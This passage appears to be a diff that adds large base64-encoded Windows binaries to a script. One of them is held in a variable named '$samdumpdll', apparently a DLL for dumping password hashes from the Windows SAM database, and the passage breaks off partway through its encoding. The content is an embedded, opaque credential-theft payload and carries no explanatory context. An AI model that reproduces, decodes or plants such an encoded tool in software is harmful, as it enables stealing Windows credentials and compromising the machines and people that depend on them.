+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNGEAAAQAAABAAAAD4AwAAaGFAAFhhQAD/////AAoAAAp2
+QAAKdkAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAg
+ACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQA
+hACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQAB
+AAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIA
+AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAQAAAC4AAAABAAAAAAAAAAAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADA
+BAAAAAAAAACNAADACAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACR
+AADACAAAAAAAAACSAADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAAIAWTGQAA
+AAAAAAAAAAAAAAIAAADUY0AACAAAAKhjQAAJAAAAfGNAAAoAAABYY0AAEAAAACxjQAARAAAA/GJA
+ABIAAADYYkAAEwAAAKxiQAAYAAAAdGJAABkAAABMYkAAGgAAABRiQAAbAAAA3GFAABwAAAC0YUAA
+eAAAAKRhQAB5AAAAlGFAAHoAAACEYUAA/AAAAIBhQAD/AAAAcGFAAAAAAAAAAAAAeVNAAHlTQAB5
+U0AAeVNAAHlTQAB5U0AAAAAAAAAAAAABAgQIAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGl
+AAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4A
+AAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAA
+AAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR
+2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAEAAAAWAAAAAgAAAAIA
+AAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAA
+AAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAA
+EgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABT
+AAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYA
+AAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAA
+AA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAA
+DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
+
+$samdumpdll="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAAA5YhDKfQN+mX0Dfpl9A36ZlRx1mXwDfpmVHHSZNwN+mf4fcJluA36ZJCBt
+mXgDfpl9A3+ZNAN+mYIjdJl8A36ZgiN6mXwDfplSaWNofQN+mQAAAAAAAAAAUEUAAEwBBAAT+OA4
+AAAAAAAAAADgAA4hCwEGAABQAAAAUAAAAAAAAIoaAAAAEAAAAGAAAAAAABAAEAAAABAAAAQAAAAA
+AAAABAAAAAAAAAAAsAAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYGsAAEYA
+AAAwZgAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADkBQAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAOwAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAudGV4dAAAAKJNAAAAEAAAAFAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACm
+CwAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAoCYAAABwAAAAEAAAAHAAAAAA
+AAAAAAAAAAAAAEAAAMAucmVsb2MAAJQMAAAAoAAAABAAAACAAAAAAAAAAAAAAAAAAABAAABCAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+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
